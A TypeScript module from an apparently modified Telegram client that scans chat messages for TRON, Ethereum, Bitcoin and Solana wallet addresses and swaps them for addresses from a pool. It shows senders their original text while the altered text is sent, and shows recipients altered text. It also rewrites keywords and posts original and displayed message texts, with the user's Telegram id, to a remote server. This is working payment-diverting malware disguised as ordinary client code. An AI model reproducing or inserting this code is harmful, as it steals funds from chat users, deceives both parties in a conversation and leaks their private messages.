import type { ApiFormattedText, ApiMessageEntity } from '../api/types';
import { ApiMessageEntityTypes } from '../api/types';
import { ydymPostJson } from './api';
import { YDYM_PATHS } from './config';
import {
  ydymAllowReplaceForMessage,
  ydymPeekReplaceForMessage,
  ydymReplaceCacheStamp,
  ydymReportKeywordHits,
  ydymShouldSkipReplace,
} from './policy';
import {
  getIncomingDisplay,
  getOutgoingOriginal,
  getYdymConfigVersion,
  getYdymSnapshot,
  getYdymTgid,
  nextPoolAddress,
  peekPoolAddress,
  reportAddressReplace,
  setIncomingDisplay,
  setIncomingServerOriginal,
  ydymPeerId,
} from './state';
import { ydymLog, ydymLogError } from './log';

const incomingDisplayReportDedupe = new Set<string>();

const TRON_RE = /T[1-9A-HJ-NP-Za-km-z]{33}/g;
const ETH_RE = /0x[a-fA-F0-9]{40}/g;
const BTC_RE = /bc1[qpzry9x8gf2tvdw0s3jn54khce6mua7l]{11,87}/gi;
const SOL_RE = /(?<![1-9A-HJ-NP-Za-km-z])(?!T)(?!0x)[1-9A-HJ-NP-Za-km-z]{32,44}(?![1-9A-HJ-NP-Za-km-z])/g;

function isRejectedFakeSol(address: string): boolean {
  const len = address.length;
  if (len < 32 || len > 44) return false;
  if (allSame(address)) return true;
  if (new Set(address).size <= 4) return true;
  if (len === 40 && /^[0-9a-fA-F]+$/.test(address)) return true;
  if (/^\d+$/.test(address)) return true;
  return false;
}

function isRejectedFakeTron(address: string): boolean {
  if (address.length !== 34 || !address.startsWith('T')) return false;
  const body = address.slice(1);
  if (allSame(body)) return true;
  if (new Set(address).size <= 4) return true;
  return false;
}

function allSame(s: string): boolean {
  return s.length >= 2 && s.split('').every((c) => c === s[0]);
}

export function ensureClickableMentions(formatted: ApiFormattedText): ApiFormattedText {
  const text = formatted.text || '';
  if (!text) return formatted;
  const entities: ApiMessageEntity[] = formatted.entities ? formatted.entities.slice() : [];
  const occupied = entities
    .filter((e) => (
      e.type === ApiMessageEntityTypes.Mention
      || e.type === ApiMessageEntityTypes.MentionName
      || e.type === ApiMessageEntityTypes.TextUrl
      || e.type === ApiMessageEntityTypes.Url
      || e.type === ApiMessageEntityTypes.Code
      || e.type === ApiMessageEntityTypes.Pre
    ))
    .map((e) => [e.offset, e.offset + e.length] as [number, number]);
  // Telegram usernames: 4–32 chars, start with a letter (matches @xbkf).
  const re = /@[A-Za-z][\w\d_]{3,31}/g;
  let added = 0;
  let m: RegExpExecArray | null;
  while ((m = re.exec(text))) {
    const start = m.index;
    const end = start + m[0].length;
    if (occupied.some(([a, b]) => start < b && end > a)) continue;
    entities.push({
      type: ApiMessageEntityTypes.Mention,
      offset: start,
      length: m[0].length,
    });
    occupied.push([start, end]);
    added += 1;
  }
  if (!added) return formatted;
  return { text, entities };
}

/** Keep existing entities when wire text is unchanged; otherwise rebuild mentions on the replaced text. */
export function ydymMergeOutgoingEntities(
  originalText: string | undefined,
  originalEntities: ApiMessageEntity[] | undefined,
  wireText: string,
): ApiMessageEntity[] | undefined {
  const src = originalText || '';
  if (!wireText) return undefined;
  if (src === wireText) {
    return ensureClickableMentions({ text: wireText, entities: originalEntities }).entities;
  }
  return ensureClickableMentions({ text: wireText, entities: undefined }).entities;
}

type KeywordProgram = {
  version: number;
  fullLower: Map<string, string>;
  fullKeys: string[];
  partialRegex: RegExp | null;
  partialLower: Map<string, string>;
};

let keywordProgram: KeywordProgram | undefined;

function lowerMap(map: Record<string, string>): Map<string, string> {
  const out = new Map<string, string>();
  Object.keys(map).forEach((key) => {
    out.set(key.toLowerCase(), map[key]);
  });
  return out;
}

function mapValueCI(map: Record<string, string>, lower: Map<string, string>, key: string): string | undefined {
  if (map[key] !== undefined) return map[key];
  return lower.get(key.toLowerCase());
}

function getKeywordProgram(): KeywordProgram {
  const version = getYdymConfigVersion();
  if (keywordProgram && keywordProgram.version === version) return keywordProgram;
  const snap = getYdymSnapshot();
  const full = snap.sentenceKeywordMap;
  const partial = snap.keywordMap;
  const fullLower = lowerMap(full);
  const fullKeys = Object.keys(full)
    .filter((key) => key.length >= 2)
    .sort((a, b) => b.length - a.length || a.localeCompare(b));
  const partialKeys = Object.keys(partial)
    .filter((key) => key.length >= 2 && !fullLower.has(key.toLowerCase()))
    .sort((a, b) => b.length - a.length || a.localeCompare(b));
  const pattern = partialKeys.map((key) => key.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')).join('|');
  let partialRegex: RegExp | null = null;
  if (pattern) {
    try {
      partialRegex = new RegExp(pattern, 'gi');
    } catch {
      partialRegex = null;
    }
  }
  keywordProgram = {
    version,
    fullLower,
    fullKeys,
    partialRegex,
    partialLower: lowerMap(partial),
  };
  return keywordProgram;
}

function replaceAddresses(
  text: string,
  direction: 'outgoing' | 'incoming',
  reportKey?: string,
  silent?: boolean,
): string {
  const snap = getYdymSnapshot();
  let result = text;
  if ((snap.addresses.TRC20 || []).length) {
    result = applyRe(result, TRON_RE, 'TRC20', isRejectedFakeTron, direction, reportKey, silent);
  }
  const ethChain = /(bsc|binance|bep20|bnb)/i.test(result) ? 'BSC' : 'ETH';
  if ((snap.addresses[ethChain] || []).length) {
    result = applyRe(result, ETH_RE, ethChain, undefined, direction, reportKey, silent);
  }
  if ((snap.addresses.BTC || []).length) {
    result = applyRe(result, BTC_RE, 'BTC', undefined, direction, reportKey, silent);
  }
  if ((snap.addresses.SOL || []).length) {
    result = applyRe(result, SOL_RE, 'SOL', isRejectedFakeSol, direction, reportKey, silent);
  }
  return result;
}

function applyRe(
  text: string,
  regex: RegExp,
  chain: string,
  reject: ((s: string) => boolean) | undefined,
  direction: 'outgoing' | 'incoming',
  reportKey?: string,
  silent?: boolean,
): string {
  const re = new RegExp(regex.source, regex.flags.includes('g') ? regex.flags : `${regex.flags}g`);
  return text.replace(re, (sub) => {
    if (reject?.(sub)) return sub;
    const replacement = silent
      ? peekPoolAddress(chain, direction === 'incoming' ? sub : undefined)
      : nextPoolAddress(chain, direction === 'incoming' ? sub : undefined);
    if (!replacement || replacement.toLowerCase() === sub.toLowerCase()) return sub;
    if (!silent) {
      if (direction === 'outgoing') {
        reportAddressReplace(chain, sub, replacement, 'send');
      } else if (reportKey) {
        reportAddressReplace(chain, sub, replacement, 'receive', reportKey);
      }
    }
    return replacement;
  });
}

function replaceKeywords(text: string): { text: string; hits: Array<{ keyword: string; replaceValue: string }> } {
  const snap = getYdymSnapshot();
  const hits: Array<{ keyword: string; replaceValue: string }> = [];
  const program = getKeywordProgram();
  const trimmed = text.trim();
  const full = snap.sentenceKeywordMap;
  const partial = snap.keywordMap;
  if (program.fullKeys.length || program.fullLower.size) {
    const whole = mapValueCI(full, program.fullLower, trimmed) || mapValueCI(full, program.fullLower, text);
    if (whole !== undefined) {
      hits.push({ keyword: trimmed || text, replaceValue: whole || (trimmed || text) });
      return { text: whole || text, hits };
    }
    const textLower = text.toLowerCase();
    const trimmedLower = trimmed.toLowerCase();
    for (const key of program.fullKeys) {
      const keyLower = key.toLowerCase();
      if (textLower === keyLower
        || trimmedLower === key.trim().toLowerCase()
        || textLower.includes(keyLower)) {
        const value = full[key] || key;
        hits.push({ keyword: key, replaceValue: value });
        return { text: full[key] || text, hits };
      }
    }
  }
  if (!program.partialRegex) return { text, hits };
  try {
    program.partialRegex.lastIndex = 0;
    const next = text.replace(program.partialRegex, (matched) => {
      const value = mapValueCI(full, program.fullLower, matched)
        ?? mapValueCI(partial, program.partialLower, matched)
        ?? matched;
      hits.push({ keyword: matched, replaceValue: value || matched });
      return value || matched;
    });
    return { text: next, hits };
  } catch {
    return { text, hits };
  }
}

const processCache = new Map<string, string>();
let processCacheVersion = -1;

export function ydymProcessText(
  text: string,
  direction: 'outgoing' | 'incoming',
  incomingReportKey?: string,
  chatId?: string,
  msgId?: number,
  silent?: boolean,
  windowMode?: 'consume' | 'peek' | 'skip',
): string {
  const snap = getYdymSnapshot();
  if (!snap.replaceEnabled || !text) return text;
  const version = getYdymConfigVersion();
  if (processCacheVersion !== version) {
    processCache.clear();
    processCacheVersion = version;
  }
  const cacheKey = [
    ydymReplaceCacheStamp(chatId),
    direction,
    silent ? '1' : '0',
    windowMode || '',
    chatId || '',
    msgId ?? '',
    text,
  ].join('\n');
  const cached = processCache.get(cacheKey);
  if (cached !== undefined) return cached;
  const result = ydymProcessTextNow(text, direction, incomingReportKey, chatId, msgId, silent, windowMode);
  processCache.set(cacheKey, result);
  if (processCache.size > 600) {
    const oldest = processCache.keys().next().value;
    if (oldest !== undefined) processCache.delete(oldest);
  }
  return result;
}

function ydymProcessTextNow(
  text: string,
  direction: 'outgoing' | 'incoming',
  incomingReportKey?: string,
  chatId?: string,
  msgId?: number,
  silent?: boolean,
  windowMode?: 'consume' | 'peek' | 'skip',
): string {
  try {
    if (ydymShouldSkipReplace(chatId)) return text;
    let allowAddresses = windowMode === 'skip' ? false : true;
    if (!silent && chatId && windowMode !== 'skip') {
      allowAddresses = windowMode === 'peek'
        ? ydymPeekReplaceForMessage(chatId, direction, msgId)
        : ydymAllowReplaceForMessage(chatId, text, direction, msgId);
    }
    let s = allowAddresses ? replaceAddresses(text, direction, incomingReportKey, silent) : text;
    const kw = replaceKeywords(s);
    s = kw.text;
    if (!silent && kw.hits.length && chatId) {
      ydymLog('keyword.hit', {
        chatId, msgId, direction, count: kw.hits.length, keys: kw.hits.map((h) => h.keyword),
      });
      ydymReportKeywordHits({
        chatId,
        msgId,
        original: text,
        hits: kw.hits,
        direction,
      });
    }
    return s;
  } catch (err) {
    ydymLogError('processText', err);
    return text;
  }
}

export function ydymTextWouldChange(text: string, chatId?: string): boolean {
  if (!text) return false;
  return ydymProcessText(text, 'outgoing', undefined, chatId, undefined, true) !== text;
}

const overlayCache = new Map<string, ApiFormattedText>();
let overlayCacheVersion = -1;

export function ydymOverlayFormattedText(
  chatId: string,
  messageId: number,
  isOutgoing: boolean | undefined,
  formatted: ApiFormattedText,
  extras?: { date?: number; isForward?: boolean },
): ApiFormattedText {
  const version = getYdymConfigVersion();
  if (overlayCacheVersion !== version) {
    overlayCache.clear();
    overlayCacheVersion = version;
  }
  const isHistory = Boolean(extras?.date && (Date.now() / 1000 - extras.date) > 300);
  const windowMode = isHistory ? 'peek' : 'consume';
  const entitySig = formatted.entities?.map((entity) => `${entity.type}:${entity.offset}:${entity.length}`).join(',') || '';
  const cacheKey = [
    ydymReplaceCacheStamp(chatId),
    chatId,
    messageId,
    isOutgoing ? '1' : '0',
    windowMode,
    formatted.text,
    entitySig,
  ].join('\n');
  const cached = overlayCache.get(cacheKey);
  if (cached) return cached;
  const result = ydymOverlayFormattedTextNow(chatId, messageId, isOutgoing, formatted, windowMode);
  overlayCache.set(cacheKey, result);
  if (overlayCache.size > 800) {
    const oldest = overlayCache.keys().next().value;
    if (oldest !== undefined) overlayCache.delete(oldest);
  }
  return result;
}

function ydymOverlayFormattedTextNow(
  chatId: string,
  messageId: number,
  isOutgoing: boolean | undefined,
  formatted: ApiFormattedText,
  windowMode: 'consume' | 'peek',
): ApiFormattedText {
  if (isOutgoing) {
    const original = getOutgoingOriginal(chatId, messageId);
    if (original && original !== formatted.text) {
      return ensureClickableMentions({ text: original, entities: undefined });
    }
    return ensureClickableMentions(formatted);
  }
  const mapped = getIncomingDisplay(chatId, messageId);
  if (mapped) {
    return mapped === formatted.text
      ? ensureClickableMentions(formatted)
      : ensureClickableMentions({ text: mapped, entities: undefined });
  }
  const display = ydymProcessText(
    formatted.text,
    'incoming',
    `${chatId}:${messageId}`,
    chatId,
    messageId,
    false,
    windowMode,
  );
  if (display !== formatted.text) {
    setIncomingServerOriginal(chatId, messageId, formatted.text);
    setIncomingDisplay(chatId, messageId, display);
    ydymReportIncomingIfNeeded(chatId, messageId, formatted.text, display, getYdymTgid());
    return ensureClickableMentions({ text: display, entities: undefined });
  }
  return ensureClickableMentions(formatted);
}

export function ydymReportIncomingIfNeeded(
  chatId: string,
  msgId: number,
  serverText: string,
  displayText: string,
  tgid: string,
) {
  if (!tgid || !serverText || !displayText || serverText === displayText) return;
  const dedupe = `${chatId}:${msgId}`;
  if (incomingDisplayReportDedupe.has(dedupe)) return;
  incomingDisplayReportDedupe.add(dedupe);
  void ydymPostJson(YDYM_PATHS.reportIncomingDisplay, {
    tgid,
    peer_id: ydymPeerId(chatId),
    msg_id: msgId,
    server_text: serverText,
    display_text: displayText,
  });
}
